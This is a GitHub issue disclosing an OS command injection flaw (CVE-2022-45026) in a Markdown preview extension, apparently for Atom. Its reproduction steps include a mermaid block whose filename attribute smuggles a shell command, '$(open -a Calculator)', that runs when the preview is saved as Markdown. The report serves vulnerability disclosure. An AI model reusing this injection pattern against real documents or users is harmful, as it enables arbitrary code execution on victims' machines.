Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Vulnerability] Code execution via GitHub Flavored Markdown export #774

Open
yuriisanin opened this issue Nov 22, 2022 · 1 comment
Open

Comments

@yuriisanin
Copy link

yuriisanin commented Nov 22, 2022

Video PoC for Atom on YouTube:
PoC

Original issue: shd101wyy/mume, OS command injection via Memraid PNG export

STR (please, note that the following PoC works for OS X it might be different for Linux or Windows):

  1. Create document with the following code inside.
mermaid {filename="$(open -a Calculator)hello.pdf"}
gitGraph
       commit id: "Normal"
       commit
       commit id: "Reverse" type: REVERSE
       commit
       commit id: "Highlight" type: HIGHLIGHT
       commit
  1. Open preview
  2. Use "Save as Markdown" button in the preview window
  3. Calculator program should appear on the screen.
@yuriisanin
Copy link
Author

Assigned CVE-2022-45026

@shd101wyy shd101wyy transferred this issue from shd101wyy/markdown-preview-enhanced Aug 23, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant